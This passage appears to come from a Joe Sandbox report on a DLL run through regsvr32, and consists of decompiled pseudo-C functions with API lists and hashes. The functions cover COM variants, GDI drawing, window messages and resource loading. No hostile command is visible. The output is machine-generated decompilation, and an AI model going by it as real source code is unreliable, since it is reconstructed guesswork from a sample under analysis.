                                                                                                                							__eax = L10020F02(__eax, __ecx, __esi,  *(__edi + 8));
                                                                                                                							goto L23;
                                                                                                                						case 6:
                                                                                                                							__eflags =  *(__edi + 8);
                                                                                                                							if( *(__edi + 8) != 0) {
                                                                                                                								__eax =  *(__edi + 8);
                                                                                                                								__ecx =  *__eax;
                                                                                                                								_push(__eax);
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 4))();
                                                                                                                							}
                                                                                                                							__eax = L10020F7B(__esi);
                                                                                                                							goto L9;
                                                                                                                						case 7:
                                                                                                                							__eax = 0;
                                                                                                                							__eflags =  *(__edi + 8) - __ax;
                                                                                                                							__eax = 0 |  *(__edi + 8) != __ax;
                                                                                                                							L10:
                                                                                                                							 *__esi = __eax;
                                                                                                                							goto L23;
                                                                                                                						case 8:
                                                                                                                							_push(__edi);
                                                                                                                							_push(__esi);
                                                                                                                							__imp__#10();
                                                                                                                							__eflags = __eax;
                                                                                                                							if(__eax == 0) {
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							goto L22;
                                                                                                                						case 9:
                                                                                                                							goto L21;
                                                                                                                						case 0xa:
                                                                                                                							 *_t74 =  *((intOrPtr*)(_t69 + 8));
                                                                                                                							goto L23;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t56 = _t76 - 0x2c;
                                                                                                                					__imp__#12(_t56, _t69, 0, _t51);
                                                                                                                					 *(_t76 - 0x10) = _t56;
                                                                                                                					if(_t56 >= 0) {
                                                                                                                						_t69 = _t76 - 0x2c;
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						 *( *(_t76 + 0x10)) = 0;
                                                                                                                						L28:
                                                                                                                						return E10047725(_t56);
                                                                                                                					}
                                                                                                                				}
                                                                                                                 			}

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100397A0
                                                                                                                  • Part of subcall function 100235FF: _memset.LIBCMT ref: 10023607
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 100397D4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10039885
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ChangeClearH_prolog3Type_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3387022819-0
                                                                                                                • Opcode ID: cf2714e3107d7e1b2c48b6da0e02d075f4c9bc30e63eddf9542c72dcb47014f8
                                                                                                                • Instruction ID: 1d291c353aeb479c168afaf0fded790190f171b1b478ae307407cbeaf2668271
                                                                                                                • Opcode Fuzzy Hash: cf2714e3107d7e1b2c48b6da0e02d075f4c9bc30e63eddf9542c72dcb47014f8
                                                                                                                • Instruction Fuzzy Hash: A841C534C04616DFCB12DF64C8405AEFBB5FF86312F608959E8A5AF641CB30E951DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E10043DEE(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				struct tagRECT _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed short _t60;
                                                                                                                				signed short _t65;
                                                                                                                				intOrPtr _t67;
                                                                                                                				signed int _t73;
                                                                                                                				void* _t76;
                                                                                                                				void* _t80;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				_v24 = 1;
                                                                                                                				_v20 = 1;
                                                                                                                				_push(GetStockObject(0));
                                                                                                                				_t85 = L1000CF95(__ecx, __ecx, _t80, _t84, __eflags);
                                                                                                                				_v16 = _t85;
                                                                                                                				_v8 = E1001FDD8(_t76, _t80, _t85, __eflags);
                                                                                                                				_t60 =  *(_t76 + 0x74);
                                                                                                                				_v12 = _t85;
                                                                                                                				if((0x0000a000 & _t60) == 0) {
                                                                                                                					__eflags = _t60 & 0x00005000;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_v24 = GetSystemMetrics(0x20) - 1;
                                                                                                                						_v20 = GetSystemMetrics(0x21) - 1;
                                                                                                                						_t65 =  *(_t76 + 0x78);
                                                                                                                						__eflags = 0x0000a000 & _t65;
                                                                                                                						if((0x0000a000 & _t65) == 0) {
                                                                                                                							L6:
                                                                                                                							__eflags = _t65 & 0x00005000;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								L9:
                                                                                                                							} else {
                                                                                                                								__eflags =  *(_t76 + 0x7c);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags =  *(_t76 + 0x7c);
                                                                                                                							if(__eflags != 0) {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_v12 = _v8;
                                                                                                                					} else {
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                				}
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_v20 = 0;
                                                                                                                					_v24 = 0;
                                                                                                                				}
                                                                                                                				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
                                                                                                                					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                                                                				}
                                                                                                                				_t97 =  *(_t76 + 0x24);
                                                                                                                				_t67 = _v8;
                                                                                                                				if( *(_t76 + 0x24) == 0) {
                                                                                                                					_t67 = _v16;
                                                                                                                				}
                                                                                                                				E1001FE7B(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                                                                				asm("movsd");
                                                                                                                				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                                                                				asm("movsd");
                                                                                                                				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                                                                				asm("movsd");
                                                                                                                				_t73 = 0 | _v12 == _v8;
                                                                                                                				asm("movsd");
                                                                                                                				 *(_t76 + 0x24) = _t73;
                                                                                                                				return _t73;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000000), ref: 10043E04
                                                                                                                  • Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
                                                                                                                  • Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
                                                                                                                  • Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37
                                                                                                                • InflateRect.USER32 ref: 10043E9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3923860780-0
                                                                                                                • Opcode ID: 77cdc2866bb3220ef96dfcc24128b45254a2059c46a14f052eb33bb8f99a918e
                                                                                                                • Instruction ID: 83c43c8af36dfc2abb3a7d6ee453c06656e2c6b27577534a316298b645387d5a
                                                                                                                • Opcode Fuzzy Hash: 77cdc2866bb3220ef96dfcc24128b45254a2059c46a14f052eb33bb8f99a918e
                                                                                                                • Instruction Fuzzy Hash: 10411471D012199BDF41DFA5C980AAE7BF5EF08350F2142A5ED10EB296D370AE41CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10017EC9(void* __ecx, struct HWND__** _a4) {
                                                                                                                				struct HWND__** _v8;
                                                                                                                				struct HWND__** _v12;
                                                                                                                				long _t31;
                                                                                                                				struct HWND__** _t32;
                                                                                                                				struct HWND__** _t44;
                                                                                                                				struct HWND__** _t45;
                                                                                                                				long _t47;
                                                                                                                				void* _t49;
                                                                                                                				struct HWND__** _t63;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t49 = __ecx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                                                                					_t31 = _a4;
                                                                                                                					if(_t31 != 0) {
                                                                                                                						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                                                                                							L4:
                                                                                                                							_t32 = E1002229C( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
                                                                                                                							_v12 = _t32;
                                                                                                                							_a4 = _t32;
                                                                                                                							E10012115( &_a4);
                                                                                                                							while(_a4 != 0) {
                                                                                                                								_t37 =  *((intOrPtr*)(E10012115( &_a4)));
                                                                                                                								_v8 =  *((intOrPtr*)(E10012115( &_a4)));
                                                                                                                								if((E10017A83(_t37) & 0x00020000) != 0) {
                                                                                                                									break;
                                                                                                                								} else {
                                                                                                                									_t45 = _v8;
                                                                                                                									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										L16:
                                                                                                                										_t44 = _v8;
                                                                                                                										goto L17;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							_a4 = _v12;
                                                                                                                							_t31 = E10017BAA( &_a4);
                                                                                                                							while(_a4 != 0) {
                                                                                                                								_t63 =  *(E10017BAA( &_a4));
                                                                                                                								_v8 = _t63;
                                                                                                                								if(_t63[2] == 0) {
                                                                                                                									L13:
                                                                                                                									_t31 = E10017A83(_t63);
                                                                                                                									if((_t31 & 0x00020000) == 0) {
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
                                                                                                                										goto L16;
                                                                                                                									} else {
                                                                                                                										_t63 = _v8;
                                                                                                                										goto L13;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
                                                                                                                							_t44 = _a4;
                                                                                                                							if(_t47 == 1) {
                                                                                                                								L17:
                                                                                                                								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
                                                                                                                							} else {
                                                                                                                								goto L4;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t31;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 20c07f7169c3d1fd542dabe4e85f7493f115e291a68c9aff9bfaa0f8e57f9e8f
                                                                                                                • Instruction ID: baa2da266dd1c3dce018d4e0db6ccd4fa4f71bdf7109174edae2865d4e814d47
                                                                                                                • Opcode Fuzzy Hash: 20c07f7169c3d1fd542dabe4e85f7493f115e291a68c9aff9bfaa0f8e57f9e8f
                                                                                                                • Instruction Fuzzy Hash: 89313774500119FBDB25DF91C881EAE7BB9FF41690F10806AF9098F251DA31ED81DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E1002EC50(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t51;
                                                                                                                				void* _t53;
                                                                                                                				intOrPtr _t68;
                                                                                                                				intOrPtr _t69;
                                                                                                                				intOrPtr _t70;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				signed int _t80;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                				intOrPtr* _t84;
                                                                                                                
                                                                                                                				_t83 = __eflags;
                                                                                                                				_push(0x20);
                                                                                                                				E1004764D(0x100903ec, __ebx, __edi, __esi);
                                                                                                                				_t80 = 0;
                                                                                                                				 *((intOrPtr*)(_t82 - 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)(_t82 - 0x14)) = 0x1009b784;
                                                                                                                				_t68 =  *((intOrPtr*)(_t82 + 8));
                                                                                                                				_t71 = _t82 - 0x1c;
                                                                                                                				 *(_t82 - 4) = 0;
                                                                                                                				E1001E397(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
                                                                                                                				_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                                                                                				_t84 = _t77;
                                                                                                                				 *(_t82 - 4) = 1;
                                                                                                                				_t85 = _t84 == 0;
                                                                                                                				if(_t84 == 0) {
                                                                                                                					E1000A069(_t68, _t71, _t77, 0, _t85);
                                                                                                                				}
                                                                                                                				 *_t77 = _t80;
                                                                                                                				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
                                                                                                                					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
                                                                                                                					_t51 = E1000CCCE(_t68, _t71, _t77, _t80, __eflags);
                                                                                                                					__eflags = _t51 - _t80;
                                                                                                                					 *((intOrPtr*)(_t68 - 8)) = _t51;
                                                                                                                					if(_t51 == _t80) {
                                                                                                                						goto L3;
                                                                                                                					} else {
                                                                                                                						__eflags =  *(_t82 + 0xc) - _t80;
                                                                                                                						if( *(_t82 + 0xc) != _t80) {
                                                                                                                							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
                                                                                                                						} else {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                                                                                							_t80 = 0;
                                                                                                                						}
                                                                                                                						L1000CFA3(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
                                                                                                                						E1000CA9A( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
                                                                                                                						_t69 =  *((intOrPtr*)(_t68 - 8));
                                                                                                                						__eflags = _t69 - _t80;
                                                                                                                						if(_t69 != _t80) {
                                                                                                                							_t70 =  *((intOrPtr*)(_t69 + 4));
                                                                                                                						} else {
                                                                                                                							_t70 = 0;
                                                                                                                						}
                                                                                                                						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
                                                                                                                						 *_t77 = _t70;
                                                                                                                						 *(_t82 - 4) = 0;
                                                                                                                						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                                                                                							_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                                                                                							_push(_t80);
                                                                                                                							E1001D714();
                                                                                                                						}
                                                                                                                						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t82 - 0x14)) = 0x10098308;
                                                                                                                						L1000CFF6(_t82 - 0x14);
                                                                                                                						_t53 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					 *(_t82 - 4) = 0;
                                                                                                                					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                                                                                						_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                                                                                						_push(_t80);
                                                                                                                						E1001D714();
                                                                                                                					}
                                                                                                                					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                                                                                					 *((intOrPtr*)(_t82 - 0x14)) = 0x10098308;
                                                                                                                					L1000CFF6(_t82 - 0x14);
                                                                                                                					_t53 = 0x80004005;
                                                                                                                				}
                                                                                                                				return E10047725(_t53);
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002EC57
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetDC.USER32(?), ref: 1002ECD5
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1002ED0F
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 1002ED19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2872313494-0
                                                                                                                • Opcode ID: 71820c51ad5a6b91d22aab399d9b2e235a0c88981c134e62d2c467e6414b106a
                                                                                                                • Instruction ID: 9795b432989586427fe229a53345f495e2c6ce602f8878a6b445c9d3bfb102e1
                                                                                                                • Opcode Fuzzy Hash: 71820c51ad5a6b91d22aab399d9b2e235a0c88981c134e62d2c467e6414b106a
                                                                                                                • Instruction Fuzzy Hash: B8316A75D0025ADFDF01CFA4C984AEEBBB5EF08740F608156F505AB191C774AE41DBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E100218FC(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t29;
                                                                                                                				intOrPtr _t32;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t36;
                                                                                                                				intOrPtr _t37;
                                                                                                                				signed int _t39;
                                                                                                                				void* _t47;
                                                                                                                				intOrPtr* _t48;
                                                                                                                				void* _t50;
                                                                                                                				void* _t51;
                                                                                                                				void* _t64;
                                                                                                                				void* _t65;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t68;
                                                                                                                				void* _t70;
                                                                                                                
                                                                                                                				_t65 = __edi;
                                                                                                                				_t64 = __edx;
                                                                                                                				_t51 = E1001E375(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                                				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                                				if(_t29 == 0) {
                                                                                                                					L19:
                                                                                                                					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                                				}
                                                                                                                				_t32 = _t29 - 1;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                                				if(_t32 != 0) {
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                				if(_a4 == 0) {
                                                                                                                					L8:
                                                                                                                					_push(_t65);
                                                                                                                					_t66 =  *((intOrPtr*)(E1001E302(_t51, _t65, 0, _t77) + 4));
                                                                                                                					_t70 = E1002050A(0x100bdc04);
                                                                                                                					if(_t70 == 0 || _t66 == 0) {
                                                                                                                						L18:
                                                                                                                						goto L19;
                                                                                                                					} else {
                                                                                                                						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                						_t80 = _t35;
                                                                                                                						if(_t35 == 0) {
                                                                                                                							L12:
                                                                                                                							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                                								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                								_a4 = _a4 & 0x00000000;
                                                                                                                								_t83 = _t36;
                                                                                                                								if(_t36 != 0) {
                                                                                                                									_push(_t36);
                                                                                                                									_t39 = E1004CC8F(_t51, _t64, _t66, _t70, _t83);
                                                                                                                									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                                									_a4 = _t39;
                                                                                                                									E100470E9(_t51, _t66, _t70, _t83);
                                                                                                                								}
                                                                                                                								_t37 = E10047026(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                                								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                                								if(_t37 == 0 && _a4 != _t37) {
                                                                                                                									 *((intOrPtr*)(_t70 + 0xc)) = E10047026(_t51, _t64, _t66, _t70, _a4);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_push(_t35);
                                                                                                                						if(E1004CC8F(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_a4 != 0xffffffff) {
                                                                                                                					_t47 = E10019F12();
                                                                                                                					if(_t47 != 0) {
                                                                                                                						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                                						_t77 = _t48;
                                                                                                                						if(_t48 != 0) {
                                                                                                                							 *_t48(0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                                                                                				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                                				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                                				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                                				E100217EF(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                                				goto L8;
                                                                                                                			}





















                                                                                                                0x100219bb
                                                                                                                0x100219c1
                                                                                                                0x100219c8
                                                                                                                0x100219d0
                                                                                                                0x100219d3
                                                                                                                0x100219e3
                                                                                                                0x100219e3
                                                                                                                0x100219d3
                                                                                                                0x00000000
                                                                                                                0x100219a2
                                                                                                                0x1002198c
                                                                                                                0x10021999
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021999
                                                                                                                0x1002197f
                                                                                                                0x1002192a
                                                                                                                0x1002192c
                                                                                                                0x10021933
                                                                                                                0x10021935
                                                                                                                0x10021938
                                                                                                                0x1002193a
                                                                                                                0x1002193e
                                                                                                                0x1002193e
                                                                                                                0x1002193a
                                                                                                                0x10021933
                                                                                                                0x10021943
                                                                                                                0x1002194b
                                                                                                                0x10021953
                                                                                                                0x1002195b
                                                                                                                0x10021963
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __msize_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1288803200-0
                                                                                                                • Opcode ID: 7e6aca9802086b6c4b7125c107ff73b07487bfd6a064de946bd2304e24c8b9b9
                                                                                                                • Instruction ID: ae32fc954f06dd924a99d51e7d75eaad46295e23dedae6a26b81c9720e256fe4
                                                                                                                • Opcode Fuzzy Hash: 7e6aca9802086b6c4b7125c107ff73b07487bfd6a064de946bd2304e24c8b9b9
                                                                                                                • Instruction Fuzzy Hash: 8F21A0391042119FCB54DFB0E896ADA77E5EF106A0F60856AE858CB146EB30EC81CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E1003F13E(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags, CHAR* _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HRSRC__* _t28;
                                                                                                                				void* _t29;
                                                                                                                				void* _t30;
                                                                                                                				signed int _t35;
                                                                                                                				void* _t37;
                                                                                                                				void* _t44;
                                                                                                                				signed short* _t57;
                                                                                                                				signed int _t59;
                                                                                                                				void* _t64;
                                                                                                                				void* _t66;
                                                                                                                				struct HINSTANCE__* _t67;
                                                                                                                				void* _t69;
                                                                                                                				void* _t71;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_t66);
                                                                                                                				_v8 = __ecx;
                                                                                                                				_t67 =  *(E1001E302(__ebx, __edi, _t66, __eflags) + 0xc);
                                                                                                                				_t28 = FindResourceA(_t67, _a4, 0xf1);
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t29 = LoadResource(_t67, _t28);
                                                                                                                					__eflags = _t29;
                                                                                                                					_v12 = _t29;
                                                                                                                					if(_t29 == 0) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						_t69 = LockResource(_t29);
                                                                                                                						__eflags = _t69;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L1;
                                                                                                                						} else {
                                                                                                                							_t32 =  *(_t69 + 6) & 0x0000ffff;
                                                                                                                							_push(__ebx);
                                                                                                                							_push(__edi);
                                                                                                                							_t59 = 4;
                                                                                                                							_t60 = ( *(_t69 + 6) & 0x0000ffff) * _t59 >> 0x20;
                                                                                                                							_t64 = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t32 * _t59);
                                                                                                                							_t35 = 0;
                                                                                                                							__eflags =  *(_t69 + 6);
                                                                                                                							if( *(_t69 + 6) > 0) {
                                                                                                                								_t13 = _t69 + 8; // 0x8
                                                                                                                								_t57 = _t13;
                                                                                                                								do {
                                                                                                                									 *(_t64 + _t35 * 4) =  *_t57 & 0x0000ffff;
                                                                                                                									_t60 =  *(_t69 + 6) & 0x0000ffff;
                                                                                                                									_t35 = _t35 + 1;
                                                                                                                									_t57 =  &(_t57[1]);
                                                                                                                									__eflags = _t35 - ( *(_t69 + 6) & 0x0000ffff);
                                                                                                                								} while (_t35 < ( *(_t69 + 6) & 0x0000ffff));
                                                                                                                							}
                                                                                                                							_t37 = E1003DD63(_v8, _t60, _t64,  *(_t69 + 6) & 0x0000ffff);
                                                                                                                							_push(_t64);
                                                                                                                							_t44 = _t37;
                                                                                                                							E10009F3F(_t44, _t64, _t69, __eflags);
                                                                                                                							__eflags = _t44;
                                                                                                                							if(_t44 != 0) {
                                                                                                                								_t54 =  *(_t69 + 4) & 0x0000ffff;
                                                                                                                								E1003E51C(_v8, ( *(_t69 + 2) & 0x0000ffff) + 7, ( *(_t69 + 4) & 0x0000ffff) + 7,  *(_t69 + 2) & 0x0000ffff, _t54);
                                                                                                                								_t44 = E1003E638(_v8, _t71, __eflags, _a4);
                                                                                                                							}
                                                                                                                							FreeResource(_v12);
                                                                                                                							_t30 = _t44;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					_t30 = 0;
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1003F158
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1003F16B
